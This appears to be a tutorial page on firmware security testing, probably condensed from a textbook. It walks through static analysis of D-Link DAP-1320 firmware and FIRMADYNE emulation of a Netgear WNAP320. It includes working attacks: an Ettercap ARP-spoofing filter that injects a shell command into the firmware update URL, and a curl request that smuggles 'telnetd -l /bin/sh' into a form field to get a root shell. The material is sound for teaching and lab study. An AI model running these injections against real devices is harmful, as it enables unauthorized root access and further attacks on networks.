๐จโ๐ปExploiting Embedded Devices
Exploiting Embedded Devices
Static Analysis of Vulnerabilities
Static analysis of vulnerabilities involves looking for vulnerabilities by inspecting the update packages, file systems, and binaries of the system without having to power up the device being evaluated.
Analyzing the Update Package
Tools
unzip
binwalk
Firmware Mod Kit
D-Link DAP-1320
Download Firmware
https://files.dlink.com.au/products/DAP-1320/REV_A/Firmware/Firmware_v1.10b14/
Install Firmware Mod Kit
udo apt-get install git build-essential zlib1g-dev liblzma-dev python3-magicClone Firmware Mod Kit
git clone https://github.com/rampageX/firmware-mod-kit
export PATH=$PATH:/root/DAP-1320/firmware-mod-kitExtract Firmware
sudo ./extract-firmware.sh ~/Downloads/DAP-1320_A1_FW110B14.binBrowse Extracted Directory
cd fmk
ls rootfs
ls rootfs/bin
# Verify if binaries are compiled for MIPS
file rootfs/bin/busybox
# Locate executable files
find . -type -f -perm /u+x
# Determine the directory structure
find . -type d
# Find web servers or associated technologies
find . -type f -perm /u+x -name "*httpd*" -o -name "*cgi*" -o -name "*nginx*"
# Find library versions
for i in `find . -type d -name lib`; do find $i -type f; done
# Find HTML, Javascript, CGI, and config files
find . -name "*htm*" -o -name "*.js" -o -name "*.cgi*" -o -name "*.conf*"
# Look for an executable version (for example, with lighttpd)
strings sbin/lighttpd | grep lighttpd
# Look for configuration files
find . -name *.confNOTE
Any executable or library found that has a version needs to be cross-
checked against known vulnerabilities. For example, use a Google search of
<name> <version number> vulnerabilityPerforming Vulnerability Analysis
Common Vulnerabilities
Command-Injection
Format-String
Buffer-Overflow
Use-After-Free
Misconfiguration
and more
Look for format strings (%s)
strings bin/ssi | grep "%s" | grep "/dev/null"Reverse Engineering SSI Binary
After opening
the ssi binary in Ghidra and ensuring that the processor is set to MIPS, we then take the following steps:
1. Search for the string of interest.
2. Determine how the string is used.
3. Determine where the URL comes from (if it is hardcoded, we are not interested in it).Grep download_fw_lp
grep -r download_fw_lp
grep -C 7 download_fw_lp www/Firmware.htmAt this point, we will move on to attempting to exploit the device through the firmware update.
Dynamic Analysis with Hardware
The static analysis portion of the assessment is complete. From this point forward, we will be looking at the system as it runs. We need to set up an environment for intercepting requests from the device to the WAN, connect the DAP-1320 to our test network, and begin exercising the firmware update process. The end goal is to execute something on the wireless extender through command injection.
The Test Environment Setup
The test setup weโve chosen uses 64-bit Kali Linux 2017, Ettercap, the DAP- 1320 wireless range extender with firmware version 1.11, and a stock wireless network. The idea is to ARP-spoof the DAP-1320 so that all traffic to and from the device goes through our Kali Linux system. Although we could have simply put a device inline between the extender and the router that can forward traffic after inspection and modification, ARP spoofing would be the likely attack mechanism used in the field.
Ettercap
As a quick refresher, Address Resolution Protocol (ARP) is the mechanism for resolving an IP address to its Media Access Control (MAC) address. The MAC address is a unique address assigned by the manufacturer of the network device. Simply put, when a station needs to communicate with another station, it uses ARP to determine the MAC address associated with the IP to use. ARP spoofing effectively poisons the ARP tables of the stations, causing them to use the attackerโs MAC address instead of the actual MAC address of the target station. Therefore, all traffic to a destination traverses through the attackerโs station. This effectively puts a device inline without having to physically modify the network.
Ettercap is a tool that allows us to ARP-spoof for the purposes of man-in- the-middle (MITM) attacks, parse the packets, modify them, and forward them to the recipient. To begin with, we use Ettercap to see the traffic between the device and the Internet by issuing the following command (where the device is 192.168.1.173 and the gateway is 192.168.1.1 in this example):
ettercap -T -q -M arp:remote /<device ip>// /<router ip>//Wireshark
Click on the New Firmware button and then follow the TCP Stream within Wireshark.
By going to the URL we captured, we can see that the XML contains the FW versionโs major and minor numbers, the download site, and release notes.
Ettercap Filter
change the minor number to 12 and the firmware link to a shell command
# ettercap.filter
if (ip.proto==TCP && tcp.src==80)
{
msg("Processing Minor Response ..\n");
if (search(DATA.data, "<Minor>11")
{
replace("<Minor>11", "<Minor>12");
msg("zapped Minor version!\n");
}
if (ip.proto==TCP && tcp.src==80)
{
msg("Processing Firmware Response..\n");
if (search(DATA.data, "http://d"))
{
replace("http://d", "`reboot`");
msg("zapped firmware!\n");
}
}
} # etterfilter ettercap-reboot.filter -o ettercap-reboot.ef
# ettercap -T -q -F ettercap-reboot.ef -M arp:remote /192.168.1.173// /192.168.1.1//In order to determine if our command is getting executed, we need to ping the box and monitor the ping messages as we issue an upgrade. But first, notice that after clicking the Check for New Firmware button, we now see that there is a 1.12 version available to download.
Prior to clicking the Upgrade Firmware button, we need to set up our ping to monitor the device. When we click the Upgrade Firmware button, we should see the download progress box.
ping <device ip>You will notice that the host becomes nonresponsive and later comes back online . This indicates that the box was rebooted. At this point, weโve proven that we can inject a command into the upgrade URL and the device will execute it. Without uploading an executable to the device, you are limited by what is on the device. For example, as previously explained, if telnetd is compiled into the Busybox (it is not on this system), you can just start it to access the shell without a password, as follows:
telnetd -l /bin/shDynamic Analysis with Emulation
It turns out, in some cases, not to be necessary to have hardware in hand to perform vulnerability analysis and exploit firmware.
FIRMADYNE
The FIRMADYNE3 tool allows for the emulation of firmware by using the QEMU hypervisor. The beauty of this approach is that you do not have to buy the hardware to test the firmware. This powerful approach allows for scaled testing in parallel. Dominic Chen downloaded and tested more than 23,000 specimens of firmware and was able to successfully run about 9,400 of them (approximately 40 percent),4 which is not bad at all.
Setting Up FIRMADYNE
First, we need to set up the FIRMADYNE tool by using the instructions found on the FIRMADYNE GitHub
Setup
First, clone this repository recursively and install its dependencies.
sudo apt-get install busybox-static fakeroot git dmsetup kpartx netcat-openbsd nmap python-psycopg2 python3-psycopg2 snmp uml-utilities util-linux vlan
git clone --recursive https://github.com/firmadyne/firmadyne.gitExtractor
The extractor depends on the binwalk tool, so we need to install that and its dependencies.
git clone https://github.com/ReFirmLabs/binwalk.git
cd binwalk
sudo ./deps.sh
sudo python ./setup.py install
sudo apt-get install python-lzma
sudo -H pip install git+https://github.com/ahupp/python-magic
sudo -H pip install git+https://github.com/sviehb/jefferson
git clone https://github.com/firmadyne/sasquatch.git
sudo apt-get install build-essential liblzma-dev liblzo2-dev zlib1g-dev
cd sasquatch/; make; sudo make install
git clone https://github.com/devttys0/sasquatch.git
sudo apt-get install build-essential liblzma-dev liblzo2-dev zlib1g-dev
./build.shDatabase
Next, install the PostgreSQL database:
sudo apt-get install postgresqlThen, set up user firmadyne with the password โfirmadyneโ (when prompted):
sudo -u postgres createuser -P firmadyne
<Enter password>Now, create the database and initialize it. Notice firmware is appended to the end of the next command:
sudo -u postgres createdb -O firmadyne firmware
sudo -u postgres psql -d firmware < ./firmadyne/database/schemaDownload the pre-built binaries for FIRMADYNE (or build binaries using instructions on the FIRMADYNE GitHub):
cd ./firmadyne; ./download.shQEMU
sudo apt-get install qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utilsFinally, set the FIRMWARE_DIR variable in the firmadyne.config file to the location of the firmadyne files:
sed -i 's#/vagrant/firmadyne#/firmadyne/firmadyne#' firmadyne.config
sed -i 's/#FIRMADYNE_DIR/FIRMWARE_DIR/' firmadyne.config
head firmadyne.configEmulating Firmware
Now that you have set up the environment, you may emulate a sample firmware (again, as described on the FIRMADYNE GitHub).
First, using the extractor script, extract the firmware:
wget http://www.downloads.netgear.com/files/GDC/WNAP320/WNAP320%20Firmware%20Version%202.0.3.zip
./sources/extractor/extractor.py -b Netgear -sql 127.0.0.1 -np -nk "WNAP320 Firmware Version 2.0.3.zip" imagesNow, you may use the getArch script to get the architecture and store it in the database (enter the firmadyne DB password when prompted, which is โfirmadyneโ):
./scripts/getArch.sh ./images/1.tar.gzNow, store the location of the extracted file system into the database:
./scripts/tar2db.py -i l -f ./images/1.tar.gzNext, make a virtual image to launch with QEMU, using the make Image script:
sudo ./scripts/makeImage.sh lThen, infer the network (this command will run for up to 60 seconds, so be patient):
./scripts/inferNetwork.sh lNow that you know what the IP is, run the emulator:
./scratch/1/run.shIf at any time you mess up the preceding commands and want to reset the database and environment, simply run the following commands:
psql -d postgres -U firmadyne -h 127.0.0.1 -q -c 'DROP DATABASE "firmware"'
sudo -u postgres createdb -O firmadyne firmware
sudo -u postgres psql -d firmware < ./database/schema
sudo rm -rf ./images/*.tar.gz
sudo rm -rf scratch/At this point, the firmware should be running on the preceding IP as a tap device. You should also be able to connect to this virtual interface from the machine on which you are running QEMU. This is fine if you are working from that machine with a desktop environment (GUI) running. However, in our case, because we are running the QEMU in a virtual machine with no desktop environment running, we will need to get creative if we want to play with the interface from another host.
NOTE It is important to be running in NAT mode on your virtual machine
in order for the following instructions to work.Tunneling
To do this, we can use the Python sshuttle5 program to tunnel all network traffic through SSH to the virtual host. In this manner, we can access the remote tap device, as if we were local to the virtual machine. Because sshuttle runs in Python, it works on Linux, macOS, and Windows.
sudo pip install sshuttleNow launch it:
sshuttle --dns -r username@<ip address> -NNow, from the system that is running sshuttle, open a web browser and try to connect to that IP.
Exploiting Firmware
# nmap
nmap <ip address>
# Injecting Command to start telnet server
curl -L --max-redir 0 -m 5 -s -f -X POST -d "macAddress=000000000000;telnetd -l /bin/sh;®info=1&writeData=Submit" http://<ip address>/boardDataWW.php
# telnet
telnet <ip address>
idFrom the previous output, you should note that we have injected a command to start the telnet server. The โtelnet โl /bin/shโ argument starts the telnet server on the default port and binds it to the โ/bin/shโ shell. The nmap scan shows that port 23 is now open. After connecting to telnet, you will note that the user is root. Although this has been done on emulated firmware, the same can be accomplished on the actual firmware. At this point, the attacker has root access on the device and can potentially use the device as a launching point for other attacks on the network.
REFERENCES
D-Link Vulnerability: www.kb.cert.org/vuls/id/184100
Firmadyne: www.github.com/firmadyne/firmadyne
Firmware Mod Kit: https://github.com/rampageX/firmware-mod-kit
Last updated
Was this helpful?